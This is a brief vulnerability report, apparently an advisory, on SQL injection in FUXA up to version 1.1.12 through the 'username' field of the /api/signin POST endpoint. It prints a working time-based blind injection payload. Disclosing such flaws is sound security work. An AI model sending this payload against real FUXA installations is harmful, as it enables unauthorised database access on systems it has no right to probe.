Its possible do inject SQL code into the JSON parameter "username" from the endpoint /api/signin via HTTP POST request
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}
Name Affected product: FUXA
Version affected: <= 1.1.12
Problem: SQL Injection
Description: Its possible do inject SQL code into the JSON parameter "username" from the endpoint /api/signin via HTTP POST request